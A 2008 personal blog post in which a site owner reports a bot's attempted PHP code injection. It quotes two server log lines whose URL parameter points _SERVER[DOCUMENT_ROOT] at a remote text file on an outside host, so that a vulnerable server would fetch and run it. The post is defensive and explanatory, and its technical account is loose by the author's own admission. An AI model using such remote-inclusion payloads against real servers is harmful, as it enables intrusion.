Posted by Hans de Ruiter
EDIT (24/7/2008): Hot on the heels of this code injection attempt, comes another one (link).
Today, the following two lines appeared in the server log:
- 18.104.22.168 - - [23/Jul/2008:08:56:10 -0400] "GET /i-declare-this-site-to-be-fully-operational/index.php?_SERVER[DOCUMENT_ROOT]=http://kingkool2.free.fr/ezupload/ips.txt? HTTP/1.1" 404 20342 "-" "libwww-perl/5.79"
- 22.214.171.124 - - [23/Jul/2008:08:56:19 -0400] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://kingkool2.free.fr/ezupload/ips.txt? HTTP/1.1" 404 8497 "-" "libwww-perl/5.79"
Whilst I am not an expert in PHP, these two entries are definitely an attempt to perform a code-injection exploit. If PHP code parses the parameters passed in the URL (the part of the URL after '?') without performing adequate checks, it is possible to trick the server into executing external code. In the case above, executing the parameters passed in the URL would change the document root directory to "http://kingkool2.free.fr/ezupload/ips.txt?". Exactly what would happen after that, I do not know. However, one can expect it to be malicious.
The user agent's ID: "Libwww-perl/5.79" suggests that the request was made by a Perl script that was most likely written for the purpose of finding, and/or attacking, susceptible servers. Fortunately, Silverstripe (the CMS that this site uses) has robust parameter checking. Hence, the server simply returned a 404 "page not found" error, and the hacking attempt did nothing. This is, however, a reminder to be serious about network security.
Being new to maintaining a website, I have no idea whether this is a new or old attack. It certainly does not look overly sophisticated. A quick on-line search did not bring any useful information. If anyone knows more about this kind of attack, or where more information about webserver security can be found, I would be interested to hear from you. Either leave a comment here, or visit the contact page on this website.
Blog » Bot Attack!
Blog » Bot Attack!